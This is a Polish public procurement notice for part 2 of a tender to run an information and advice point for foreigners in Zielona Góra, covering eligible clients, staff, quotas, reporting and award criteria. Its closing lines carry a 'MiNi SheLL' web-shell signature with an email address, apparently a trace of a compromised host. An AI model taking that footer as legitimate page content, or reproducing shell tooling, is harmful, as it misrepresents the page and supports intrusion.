z wyjątkiem ust. 1 pkt 6) lub zezwolenia na pobyt rezydenta długoterminowego UE (art. 211), - na podstawie dokumentu potwierdzającego posiadanie zgody na pobyt tolerowany o nazwie ,,zgoda na pobyt tolerowany" (art. 226 ust. 5),- zgody na pobyt ze względów humanitarnych.b) Dzieci ww. osób (nie będące obywatelami UE) urodzone na terytorium Rzeczypospolitej Polskiej. Pozostałe dzieci podlegają warunkom z punktu a i g. c) Cudzoziemcy, którzy złożyli wniosek o udzielenie zezwolenia na zamieszkanie na czas oznaczony w trybie abolicji, a obecnie przebywający na terytorium RP na podstawie stempla, którzy: - złożyli wniosek o udzielenie zezwolenia na pobyt czasowy (art. 108 ust. 1 pkt 2) - złożyli wniosek o udzielenie zezwolenia na pobyt stały (art. 206 ust. 1 pkt 2) - złożyli wniosek o udzielenie zezwolenia na pobyt rezydenta długoterminowego UE - złożyli wniosek o przedłużenie wizy Schengen lub wizy krajowej (art. 87 ust. 1 pkt 1), w którym uzasadnienie jest zgodne z jednym z następujących celów wskazanych w art. 60 ust. 1: pkt. 4-6, 9-13, 17, 19-21, 23-25, - złożyli wniosek o przedłużenie okresu pobytu w ramach ruchu bezwizowego na terytorium RP (art. 300 ust. 4). d) Przebywają na terytorium RP w ramach ruchu bezwizowego.e) Cudzoziemcy nie będący obywatelami UE, przebywający na terytorium RP, którzy są w trakcie uzyskiwania zezwolenia na legalny pobyt w Polsce. UWAGA wsparcie dla tych osób jest ograniczone do pomocy w uzyskaniu legalnego pobytu. f) Małżonkowie, wstępni oraz zstępni osób należących do grup ww. 1-4, w takim zakresie jaki jest konieczny do skutecznej realizacji działań.g) Osoby, nie będące obywatelami UE, przebywające na terytorium RP legalnie, które złożyły wniosek o:- udzielenie cudzoziemcowi zezwolenia na pobyt rezydenta długoterminowego Unii Europejskiej (art. 223),- przedłużenie wizy Schengen lub wizy krajowej (art. 87), w którym uzasadnienie jest zgodne z jednym z następujących celów wskazanych w art. 60 ust. 1: pkt. 4-6, 9-13, 17, 19-21, 23-25,- przedłużenie okresu pobytu w ramach ruchu bezwizowego na terytorium RP (art. 300) i uzyskały w dokumencie podróży odcisk stempla potwierdzającego złożenie wniosku o udzielenie zezwolenia. Z powyższej grupy klientów wyłączeni są obywatele kraju trzeciego posiadający również obywatelstwo jednego z krajów UE.14) Punkt będzie zapewniał wykwalifikowaną kadrę pracowniczą tj.:- doradcę integracyjnego posługującego się językiem ukraińskim lub rosyjskim w stopniu umożliwiającym swobodną komunikację. Doradca integracyjny będzie zatrudniony przez cały okres trwania projektu,- prawnika posiadającego uprawnienia wymagane dla radcy prawnego lub adwokata. Prawnik będzie świadczył usługi w punkcie co najmniej 2 godziny w tygodniu przez cały okres trwania projektu.- psychologa, którego wykształcenie będzie potwierdzone dyplomem ukończenia jednolitych studiów magisterskich na kierunku psychologia. Psycholog będzie świadczył usługi w punkcie co najmniej 1 godzinę w tygodniu przez cały okres trwania projektu. 15) Na podstawie art. 29 ust. 3a ustawy Zamawiający wymaga, aby osoba wskazana jako doradca integracyjny wykonujący czynności informacyjno - doradcze zatrudniony był przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2018 r. poz. 108).16) Wykonawca przez okres trwania projektu udzieli pomocy co najmniej 1500 cudzoziemcom. 17) Wykonawca zobowiązany będzie do udzielenia co najmniej:- 2000 porad integracyjnych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 90,- 150 porad prawnych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 6,- 100 porad psychologicznych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 4.18)	Udzielając pomocy (porad) wykonawca będzie zobligowany do dokumentowania udzielonej pomocy za pomocą list obecności, wykazu osób, którym udzielono wsparcia, list udzielonych porad oraz deklaracji o przystąpieniu do projektu.19)	Wykonawca będzie zobligowany do dostarczania zleceniodawcy miesięcznych oraz kwartalnych sprawozdań z prowadzonych w punkcie działań.20)	Wykonawca zobowiązany jest do bieżącego dokumentowania świadczonych usług zgodnie ze wzorem druków dokumentów opracowanych przez Zamawiającego oraz przechowywania dokumentacji w punkcie.21)	Wykonawca prowadzić będzie sprawozdawczość merytoryczną i statystyczną ze świadczonych usług, w szczególności sporządzać będzie sprawozdania miesięczne i kwartalne, które przekaże Zamawiającemu w oryginale oraz w formie elektronicznej w terminie 15 dni od zakończenia miesiąca i kwartału.22)	Usługi będą świadczone na warunkach określonych w załączonym wzorze umowy.23)	Zleceniobiorca zobowiązany będzie do prowadzenia listy obecności/ wykazu osób, którym udzielono wsparcia w formie elektronicznej i przekazywania jej również w formie elektronicznej do Zamawiającego na podany adres email w terminie do 15 dnia każdego miesiąca za miesiąc poprzedni.24)	Wykonawca zobowiązuje się do uruchomienia punktu do dnia 29 czerwca 2018 r.25)	Wykonawca zapewni uroczyste otwarcie punktu. W ramach uroczystości wykonawca zapewni catering dla zaproszonych gości (ok 20).26)	Wykonawca prowadzić będzie punkt 22 miesiące od dnia uruchomienia.27)	W celu prawidłowego sporządzenia oferty, Wykonawca powinien zapoznać się z oczekiwaniami i wymogami Zamawiającego oraz uzyskać wszystkie niezbędne informacje, co do ryzyka, trudności i wszelkich innych okoliczności, jakie mogą wystąpić w trakcie realizacji zamówienia.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>79140000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 22<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin uruchomienia punktu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie personelu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Utworzenie i prowadzenie Punktu informacyjno-doradczego dla cudzoziemców na potrzeby realizacji projektu pt. ,,Lubuska Inicjatywa Integracji Cudzoziemców" realizowanego w ramach Programu Krajowego Fundusz Azylu, Migracji i Integracji w Zielonej Górze</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utworzenie i prowadzenie punktu informacyjno-doradczego na potrzeby realizacji projektu pt. ,,Lubuska Inicjatywa Integracji Cudzoziemców" realizowanego w ramach Programu Krajowego Fundusz Azylu, Migracji i Integracji, w którym obywatele państw trzecich otrzymają bezpłatną kompleksową informację i pomoc w zakresie funkcjonowania w środowisku lokalnym.Założenia funkcjonowania punktu:1) Punkt będzie zlokalizowany w miejscu ogólnodostępnym dla cudzoziemców, zapewniającym poufność rozmów.2) Wykonawca na własny koszt i własnym staraniem przystosuje lokal do świadczenia usług dla cudzoziemców.3) Punkt musi umożliwiać obsługę osób niepełnosprawnych oraz rodziców z dziećmi.4) Punkt musi zostać wyposażony w niezbędny sprzęt biurowy, tj. co najmniej:a) niezbędne meble biurowe dla pracowników (stanowisko biurowe) oraz dla odbiorców usługi (wieszak, stół i krzesła), b) sprzęt multimedialny (komputer\laptop z oprogramowaniem, faks, drukarka, skaner lub urządzenie wielofunkcyjne),c) telefon z numerem stacjonarnym,d) stały dostęp do internetu,e) wyposażenie socjalne (ekspres, czajnik, zestaw naczyń, dystrybutor z wodą).5) Wykonawca zapewni stały adres e-mail dla punktu, służący prowadzeniu korespondencji z Zamawiającym oraz z odbiorcami usług.6) W punktach będzie wydzielony kącik dla dzieci, który należy wyposażyć w stolik z krzesełkami, regał, zabawki, pufę, materiały piśmiennicze, dywanik.7) Wykonawca zapewni niezbędne do świadczenia usług materiały biurowe.8) Punkt będzie otwarty 5 dni w tygodniu, zgodnie z zaakceptowanym przez Zamawiającego harmonogramem, po minimum 6 godzin dziennie, w tym co najmniej jeden dzień do godziny 18:00 z wyłączeniem dni ustawowo wolnych od pracy.9) Usługi doradczo-informacyjne będą mogły być świadczone również poza lokalem Wykonawcy, np. w zakładach pracy.10) Wykonawca zapewni zarówno pracownikom, jak i odbiorcom usług możliwość korzystania z toalety.11) W punkcie nie może być prowadzona inna działalność gospodarcza.12) Usługi świadczone będą bezpłatne. Zakłada się, że w punkcie cudzoziemiec otrzyma rzetelną, kompleksową pomoc i doradztwo m.in. w kwestiach legalizacji pobytu, administracyjnych i prawnych, przysługujących praw pracowniczych, doradztwa i pomocy integracyjnej, opieki zdrowotnej, psychologicznej i socjalnej, opieki nad dziećmi oraz łączenia rodzin.13) Klientami punktu będą:a) Cudzoziemcy nie będący obywatelami UE, przebywający na terytorium RP legalnie, zgodnie z przepisami ustawy z dnia 12 grudnia 2013 r. o cudzoziemcach (z późniejszymi zmianami):- na podstawie wizy, o której mowa w art. 60 ust. 1 pkt. 4-6, 9-13, 17, 19-21, 23-25, - na podstawie zezwolenia na pobyt czasowy, pobyt stały (art. 195, z wyjątkiem ust. 1 pkt 6) lub zezwolenia na pobyt rezydenta długoterminowego UE (art. 211), - na podstawie dokumentu potwierdzającego posiadanie zgody na pobyt tolerowany o nazwie ,,zgoda na pobyt tolerowany" (art. 226 ust. 5),- zgody na pobyt ze względów humanitarnych.b) Dzieci ww. osób (nie będące obywatelami UE) urodzone na terytorium Rzeczypospolitej Polskiej. Pozostałe dzieci podlegają warunkom z punktu a i g. c) Cudzoziemcy, którzy złożyli wniosek o udzielenie zezwolenia na zamieszkanie na czas oznaczony w trybie abolicji, a obecnie przebywający na terytorium RP na podstawie stempla, którzy: - złożyli wniosek o udzielenie zezwolenia na pobyt czasowy (art. 108 ust. 1 pkt 2) - złożyli wniosek o udzielenie zezwolenia na pobyt stały (art. 206 ust. 1 pkt 2) - złożyli wniosek o udzielenie zezwolenia na pobyt rezydenta długoterminowego UE - złożyli wniosek o przedłużenie wizy Schengen lub wizy krajowej (art. 87 ust. 1 pkt 1), w którym uzasadnienie jest zgodne z jednym z następujących celów wskazanych w art. 60 ust. 1: pkt. 4-6, 9-13, 17, 19-21, 23-25, - złożyli wniosek o przedłużenie okresu pobytu w ramach ruchu bezwizowego na terytorium RP (art. 300 ust. 4). d) Przebywają na terytorium RP w ramach ruchu bezwizowego.e) Cudzoziemcy nie będący obywatelami UE, przebywający na terytorium RP, którzy są w trakcie uzyskiwania zezwolenia na legalny pobyt w Polsce. UWAGA wsparcie dla tych osób jest ograniczone do pomocy w uzyskaniu legalnego pobytu. f) Małżonkowie, wstępni oraz zstępni osób należących do grup ww. 1-4, w takim zakresie jaki jest konieczny do skutecznej realizacji działań.g) Osoby, nie będące obywatelami UE, przebywające na terytorium RP legalnie, które złożyły wniosek o:- udzielenie cudzoziemcowi zezwolenia na pobyt rezydenta długoterminowego Unii Europejskiej (art. 223),- przedłużenie wizy Schengen lub wizy krajowej (art. 87), w którym uzasadnienie jest zgodne z jednym z następujących celów wskazanych w art. 60 ust. 1: pkt. 4-6, 9-13, 17, 19-21, 23-25,- przedłużenie okresu pobytu w ramach ruchu bezwizowego na terytorium RP (art. 300) i uzyskały w dokumencie podróży odcisk stempla potwierdzającego złożenie wniosku o udzielenie zezwolenia. Z powyższej grupy klientów wyłączeni są obywatele kraju trzeciego posiadający również obywatelstwo jednego z krajów UE.14) Punkt będzie zapewniał wykwalifikowaną kadrę pracowniczą tj.:- doradcę integracyjnego posługującego się językiem ukraińskim lub rosyjskim w stopniu umożliwiającym swobodną komunikację. Doradca integracyjny będzie zatrudniony przez cały okres trwania projektu,- prawnika posiadającego uprawnienia wymagane dla radcy prawnego lub adwokata. Prawnik będzie świadczył usługi w punkcie co najmniej 2 godziny w tygodniu przez cały okres trwania projektu.- psychologa, którego wykształcenie będzie potwierdzone dyplomem ukończenia jednolitych studiów magisterskich na kierunku psychologia. Psycholog będzie świadczył usługi w punkcie co najmniej 1 godzinę w tygodniu przez cały okres trwania projektu. 15) Na podstawie art. 29 ust. 3a ustawy Zamawiający wymaga, aby osoba wskazana jako doradca integracyjny wykonujący czynności informacyjno - doradcze zatrudniony był przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2018 r. poz. 108).16) Wykonawca przez okres trwania projektu udzieli pomocy co najmniej 1500 cudzoziemcom. 17) Wykonawca zobowiązany będzie do udzielenia co najmniej:- 2000 porad integracyjnych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 90,- 150 porad prawnych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 6,- 100 porad psychologicznych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 4.18) Udzielając pomocy (porad) wykonawca będzie zobligowany do dokumentowania udzielonej pomocy za pomocą list obecności, wykazu osób, którym udzielono wsparcia, list udzielonych porad oraz deklaracji o przystąpieniu do projektu.19) Wykonawca będzie zobligowany do dostarczania zleceniodawcy miesięcznych oraz kwartalnych sprawozdań z prowadzonych w punkcie działań.20) Wykonawca zobowiązany jest do bieżącego dokumentowania świadczonych usług zgodnie ze wzorem druków dokumentów opracowanych przez Zamawiającego oraz przechowywania dokumentacji w punkcie.21) Wykonawca prowadzić będzie sprawozdawczość merytoryczną i statystyczną ze świadczonych usług, w szczególności sporządzać będzie sprawozdania miesięczne i kwartalne, które przekaże Zamawiającemu w oryginale oraz w formie elektronicznej w terminie 15 dni od zakończenia miesiąca i kwartału.22) Usługi będą świadczone na warunkach określonych w załączonym wzorze umowy.23) Zleceniobiorca zobowiązany będzie do prowadzenia listy obecności/ wykazu osób, którym udzielono wsparcia w formie elektronicznej i przekazywania jej również w formie elektronicznej do Zamawiającego na podany adres email w terminie do 15 dnia każdego miesiąca za miesiąc poprzedni.24) Wykonawca zobowiązuje się do uruchomienia punktu do dnia 29 czerwca 2018 r.25) Wykonawca zapewni uroczyste otwarcie punktu. W ramach uroczystości wykonawca zapewni catering dla zaproszonych gości (ok 20).26) Wykonawca prowadzić będzie punkt 22 miesiące od dnia uruchomienia.27) W celu prawidłowego sporządzenia oferty, Wykonawca powinien zapoznać się z oczekiwaniami i wymogami Zamawiającego oraz uzyskać wszystkie niezbędne informacje, co do ryzyka, trudności i wszelkich innych okoliczności, jakie mogą wystąpić w trakcie realizacji zamówienia.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>79140000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 22<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin uruchomienia punktu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie personelu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com